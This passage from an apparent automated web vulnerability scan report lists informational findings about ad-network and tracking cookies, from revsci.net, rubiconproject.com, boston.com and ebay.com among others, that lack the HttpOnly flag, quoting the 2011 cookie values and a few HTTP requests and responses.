2+ch7WFtZfrqewqMwVW0ZAfpAtQ7h26QcKy0q+MVqxcq7MUNZx2eMQTwuyhLonf9PwLZ1UzVQeDFjU7mgafUm1JHPk1wyV+mOEFEfmMJ52xRa4ufegTTxdSAlNzzV+9EN5t6MdogGBASTJV9qT811onj7/yTcEMmbxyH7Ss1Ypu1s9/t815iXMrhisN+BERGg+q3Q9fBPyYWOJCslS4GMsxcO0QSjiR+1JZ1hBHBa92ULHBTn3YJh4TacbxRI6jUFL20bFvae0b6WCKRocZyFMY6YNpxAu2IJAgRRRlg9CAAFsAihhDF86jZ1ogFoh1kZ02ZM96K89gVN7/6Pm07a96FP1O/VktqJs3Ah8MhBiOaQn5zBylg+wPmz41snS+bpN0RxmNnrzALMV+hRTF97L13viywm3AXUy3tdNxYDUHeKvqavAiilKZPu/MZXSAeaiO2za1oXRLQLnTrJL1deMXqvcHq3VGWunjKW+LBVXS6rNBD61RMyQ3wEEkoU1pY1Sfrb2xBQ3LrqwkuqyzcgOgv34DpjajD6krM7mnU4rh4Ed95g2RU+IBZJhQ6txEEDjjmZueBhLN2W6r8J7RRPcMp3f8TKOMEdKCR2S/8GgI+fI0ns3f2F+uW4dRY5zpb2qQeMMXy6VJKc1ZtxrJyx69qr26SvrwNgp85qYZHjuKgNQkChBuNqu5wkm2IcE/qH7wnXqCKzRe3rCkoSTx3Uck3H+lHiXLdfU4Zf3QExDm/70fV2/m5IBluwnI9hdtsGZS+CkMhq+jiwUt58lCuswraIkUBfV+Fh5q0N2zQxooxzb1g9uSe/Zoep0Dg/Bbk6zGtx2GByY6NDPF9bZAOVKZi1NcG8pnczy90KH8rUx2rkI9Tzgsary2RnAUXbubR9zGnZn+a2yGQPAJaIYjCi8n+RGJyjA1Y9IYOfpeYjh0KK7gPbVfdmptBsnCEb8iF0znhpMhoqJAmnaGxrCmpUL+PorTKumbaCoLefeRiyXadHIt57TF6gMIjtZJEAuTCrLlXFebw8UnoEJSvoA8J78TKinQp7I5aFdKcYy87wAHUA1Ct+C724Y37c3/ey00pBqAFO8ucbpOXw+L1f8wBNYGJYbctsbfNjntdWzbMuyJkE26xbTEa0GFnVh+2HGNaNP58181OPlCYBPzQeIkr4Mh4bACILaNUJkHl6/nhfDgBT6tgzXbtroUJgvjXQegnrhTJWjtCbQVoFqEtOMwPUkVzZ0dA8pHHtKnXvZzJGlwdMywzwMfGgmMFVB7PAyVRTLvWGL/RbVQ0agMljUZIc7/2OydNgHlvw04z2gg3SJFLZphqe4s1lXbg/VxrKhMgGAIJcOkPkW2bGr56sOWPhHU0smORhLept+DDUSOpVUKFTNqA==; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:35 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.97. http://pix04.revsci.net/D08734/a1/0/3/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4z+huXIMH/C1v6FY5BD9CU6du67BSrLzzGDKYyVi7wuMG8EbAQsYoAM+8HjFdJuNxGA3/+CrpcbtEHZ/d6C7jbvv7M0vNWHRu7UTOWGMPgDtQnUJM+3UN3RAdHmCWWZdidYJ29FVf84FRt54yfn0DxXbewqnOCDFkhcpfrbm9qrWCYvAexDPzC3J2PvZfsy0paqKtZwkSPNwYDH58Nnxwd6fWe5R4HtXeze5eYPpOFwxneozVU7HcSJhRznJKY+nbXFV4Kh9TuLjJidiEALKqZqYEUfWBBwCHLNgWNCsDVbbrOurIU2np0szXUis/sUiQzf0Wf6hEdcVHk25x1YopVaDeVCwaNCIsECWnmpdYStYgcflX2fOyqpvQXpFuKLMZM26a7Cnv+bGk86zFfrtsmZ+XUjOCjCgV9VZAJLI6r/wby1TkeEYM4aKVRAcjOSNaSUouN6aq0UDfofVwofJbdaDfqnlskad6jL2nkV2oqYYN51bbjRrBJ5Zx/iFkNxeA80dBln8t7npPdnnutFI020xW6Pikz/y3wzF3Zn7ODNfmnnrXoxV2IA89MfIixDVxod6TnBvbAyjrHfxPZXpR9VpSkdunpDbZbQ0tkL4iwjlo4ovwa0wlZD7dl0qzpqpDVDzgG/K5a0fKdDgHqN06JXJDXihsaxG61k8V69rDg9gZRx72LYSDFbS+5iLzyhgdsmnsBb9i/GVpAizi/0VFp8PPCMlLuz7hDOGo+yUwLowBr0K6Cp6; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:40 GMT; Path=/
udm_0=MLv3NyEJZgpn3xSpL5u85NM5XwnsM3MjKdVcqB/a12JILatz1/QkamTspbLrwKiJ0kHW/5AU3oTEjmWXYWp2M0xUL7+WY6kjOrURsVDi62hpYV7xR6QBhj0v+pyJD3OJXK+vmR6dmK3bv866m5dV/8S0o9vxNmpKALSQclbLyFOiUbYzEkzSx6gD/xYdErrYRbvJrxQrHocSZW8IWgCBo1ZMKF3XAoyFrdWONbkKqPtnL+Tf6LeOnc/8RbibirISpR8EIRZg0bai/lhsQDUpwOFeZfVq4ADms+6bYXKqD9JyHXg0ZwDRrCWhBl1ue1BqVAn3Cr/Bwx8/fgf4osdRhn5YjD5/Y+PY6RExqP8RcxgTNdXx9V9Xq7fP8/CxpD2d4Ncg3Lwb6WRoh1vRm87/tMbWsUCyqUEjHcs9AEPUYjcC1xfTW9GtjTlaABUuUrmGg2itWP7OmRmHnGY1AG7z8DLn/+VDv99nV2ZqSoL3ECBGo5Gp+CmR/+82s/rVel/YnKz/XNzeezOmflNl/ISF2iEFYbSKl4jL2Imw3DcEFYr9gLF7thJxa959CXKjgznlBeDDDam6bQwtXdKwxq68WOD0JfNzPCFtxZ/3ySVIchlyyEMGK4ru9sNL2qhk7ThVsbKzGx3w5WC0tnxRyUM3wF7AFcroI1cVBCQX8UDlCNyuqP1eE9UH0lr8hQ9hH+eytjUTNHl50185XTe8k2I3KTCCC3V/1YUfM3sjwXon8qbgHnWylig/Q/P3gvmTN1uk6+gMf23SzvcZzS2JaZu1hhHc+zLEUQhUX2B2WD2Z1IAQyoj7hwalxN8UjEjE7dDYbkp4UpLD0vea8xMx8AwMSMuOMW+Z2BchxPI3ARZVxVwzU05RiwmP6YN1SIAvcXyk/FKuWo/NY4fTMv4mW6J5GkV7KsoK7zESEFXHC80l/FUrlSjwrgH0F9A4HdrSoCRnacUxrlabJk/bO0nQFQyClplYm45GteUUvB/yFXNWhchR5qNmBBeTnsuLjYG2ZjDj6+gYIPScc6ZJn5y6xJkKyqQDU5eYo9ZDplLH4wjRzgjncZs4b1iuMC4fjmTdUR2cDevLyGC3/dRJ9CcLuov2969ADUaV4qAQC5BiHySEoWnqc2ShEOSXAgSIgS+Eyh1EA8cPHs3CbYp/uQxx+SM1MwVT6OSTygbQTsYBbCJypY6WyLXo8mxytLhWadmEeayScWgFbHGuePFAPRquVFh96dbbF5M9RbLfAuQyLYtEa3eG+mkoAieeEZCt2m5a7NTx+Uc439ZXTiwJlFAahJEUocKPD9gyhsQNp2rpsEhJ5rdXhEIM/fln0zgalBbUBFpcvKtyWA77bjY7eCKH+sdgen0EQayIsR5HPAfq1y0RBst2xOjuOSxHlOrL8RmhvQ35RlgS+Gu73AjceiwRh0Gx1dj9Xu8+xiv2kDaH6RU9nKl1BpSf7tIpjrzjwxE1fe8GeNTkLApO3Ur7SMEtDlGU5e5U7wmQj6TKeaRm1dY/vSYq5TyKIflCXtQZmxEGf//KOjvsyVR3ZP7NK8+AbLMCSQD/OBWjetrucXmOEL9RMLrHQxXH9Vv+WOn5ixorNpStZnFCUQfrej5ibwjEcSVi1fs/7GL5+pUQywVqWob0fcbGF9zOLQJ+tj/rvPzhJXq0YA4x44xOK4w+z2tzIqlkpP+ikADD0I5fH5/0uGt4NbQGMW+JgHWCG9VlVWXq4Fy2CDkyduwyGzBgAyNcK2AcbCUfHePahhOHbixQW0gkUIyYnNVjqJn0tZ9IIQWmk2ynyVd+Eo3kixBSz6KvdGSg8RlOtZl3zHXogg==; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:40 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.98. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EMEBPQGhB4HzDj-aaRQGCBC6MiEShRggELEu09H58sHqSxA; expires=Mon, 17-Oct-2011 20:21:30 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.99. http://pixel.rubiconproject.com/di.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/di.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1%264706%3D1%262372%3D1%262190%3D1%262189%3D1%262765%3D1%262374%3D1; expires=Sun, 15-Jan-2012 20:27:49 GMT; path=/; domain=.rubiconproject.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.100. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=5575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1%267259%3D1; expires=Thu, 18-Aug-2011 18:39:10 GMT; path=/; domain=.rubiconproject.com
rpx=4212%3D11993%2C1032%2C4%2C%2C%265852%3D12124%2C721%2C3%2C%2C%266432%3D12470%2C499%2C2%2C%2C%264222%3D12770%2C86%2C2%2C%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C%266811%3D13380%2C0%2C1%2C%2C%267259%3D13546%2C0%2C2%2C%2C%26733%3D13546%2C0%2C1%2C%2C; expires=Thu, 18-Aug-2011 18:39:10 GMT; path=/; domain=.pixel.rubiconproject.com
put_2211=2814750682866683; expires=Wed, 20-Jul-2011 18:39:10 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.101. http://profile.live.com/badge previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profile.live.com
Path:	/badge

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

E=P:/gMMiDcUzog=:5crcRXHCG/JAHLgCxcxWv/ztBWJ2uFCnSl1koMpH+wA=:F; domain=.live.com; path=/
SABadge=msg=&url=http%3a%2f%2fwww.factset.com%2fproducts%2fprivateequity&title=&description=&screenshot=&ctype=link&swfurl=&height=&width=&emv=; expires=Wed, 20-Jul-2011 14:30:24 GMT; path=/Badge/
sc_clustbl_142=00989dfb1d824c3c; domain=profile.live.com; expires=Thu, 18-Aug-2011 14:30:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.102. http://r.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=3698952182471149434; Domain=.turn.com; Expires=Sun, 15-Jan-2012 20:43:05 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3698952182471149434; Domain=.turn.com; Expires=Sun, 15-Jan-2012 20:43:05 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:43:04 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=3698952182471149434&rnd=3988428324264951213&fpid=4&nu=n&t=
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=vyeJOJpwHg02F8wBdbdBPcAmoZwDH4fvG8At9YA8raUYC2tBi2URwGbPGsOlGJLnFZw7LYM+wuvBYOpB5L6LI4NLGOCqyBwHcZAS; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
F1=B8K7l4EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
BASE=RagegvmNI50lwaYGzAjLGety9H7tx6n0GOPCcMMxVO/SJzIGr4njcOMwvmlYrsFznFYf9CM!; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
ROLL=2TgMxQnPNOiYeID!; domain=advertising.com; expires=Thu, 18-Jul-2013 20:44:31 GMT; path=/
14768994=_4e25ecaf,8285755238,808880^1040486^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.104. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realnetworksrealarca.tt.omtrdc.net
Path:	/m2/realnetworksrealarca/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mboxPC=1311107151665-897688.17; Domain=realnetworksrealarca.tt.omtrdc.net; Expires=Tue, 02-Aug-2011 20:25:48 GMT; Path=/m2/realnetworksrealarca

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/realnetworksrealarca/mbox/standard?mboxHost=support.gamehouse.com&mboxSession=1311107151665-897688&mboxPage=1311107151665-897688&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxXDomain=x-only&mboxCount=1&mbox=gh-global&mboxId=0&mboxTime=1311089154536&mboxURL=http%3A%2F%2Fsupport.gamehouse.com%2F&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: realnetworksrealarca.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

14.105. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.106. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.107. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.108. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QjH8A; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1370466985/HEADLINE2/boston/m_livenat061311_bchm_HEADLINE2/0615_SummerComcast_234.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1374996851/CENTRAL/boston/m_fallon070611_bchm_BIGAD/300x250_bchm_070611-fallon.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QjH8A; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/142449885/LOGO5/boston/m_dunkin020111_bchm_SPONSOR/dunkin_yt_logo100x40.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1489951529/HEADLINE1/boston/t_mspca071911_bchm_HEADLINE/234x60_bchm_071911-mspca.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1687713133/TILE1/boston/g_globeshoplocal051311_bchm_TILE/shoplocal040510_bchm_TILE.html/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QjH8J; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonialniss071911_clst_LEADER/colonial_nissan_071511_lb.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QjH8A; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/407535735/LOGO9/boston/c_herbcham0311_bchm_LOGO/hc_toyota_062411_video_sponsor_ad.jpg/726348573830334b61734941426a4977

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QjH8B; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

RMFD=011QjH71; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.117. http://rover.ebay.com/rover/1/711-53200-19255-0/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/rover/1/711-53200-19255-0/1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

npii=btpim/14e25d58a^tguid/adb7b0cb1300a0aa15432be3fe5c798450070202^cguid/3666b2e01300a47a44d622a6ffc1937250070202^trm/svid%3D9431685814850070202^; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:35:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.118. http://rover.ebay.com/roverimp/0/0/14 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/roverimp/0/0/14

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702da^cguid/3666b2e01300a47a44d622a6ffc19372500702da^trm/svid%3D94316858148500702da^; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.119. http://rover.ebay.com/roversync/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/roversync/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702d8^cguid/3666b2e01300a47a44d622a6ffc19372500702d8^trm/svid%3D94316858148500702d8^; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.120. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lgtix=NQADAAQBBgABAAMBRAQDAPQASQABAAMBSgABAAMBDAABAAMB/QACAAMBXwABAAMB; path=/; expires=Fri, 18 Jul 2014 20:44:08 GMT; domain=.legolas-media.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.121. http://s.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.stubhubstatic.com
Path:	/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=E5780050B23510B2CA4FD1ECACF16CE8; Path=/; Domain=.stubhubstatic.com
TLTSID=E5780050B23510B2CA4FD1ECACF16CE8; Path=/; Domain=.stubhubstatic.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.122. http://sales.liveperson.net/hc/21661174/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/21661174/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HumanClickSiteContainerID_21661174=STANDALONE; path=/hc/21661174

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.123. http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/realnetworks-43000165.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seal-alaskaoregonwesternwashington.bbb.org
Path:	/logo/rbhzbus/realnetworks-43000165.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

logolink=43000165; path=/; domain=alaskaoregonwesternwashington.bbb.org
logolink=43000165; path=/; domain=bbb.org

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.124. http://sitelife.boston.com/ver1.0/Direct/Jsonp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.boston.com
Path:	/ver1.0/Direct/Jsonp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22b12c8144-b20e-11e0-aa83-a59fd6e1b552%22%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback0 HTTP/1.1
Host: sitelife.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=8; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

14.125. http://sitelife.boston.com/ver1.0/Stats/Tracker.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.boston.com
Path:	/ver1.0/Stats/Tracker.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.126. http://srx.main.ebayrtm.com/rtm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://srx.main.ebayrtm.com
Path:	/rtm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A01=ABQAsMSUOAAAAAAAA5QuZsFGR1aCzORA; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
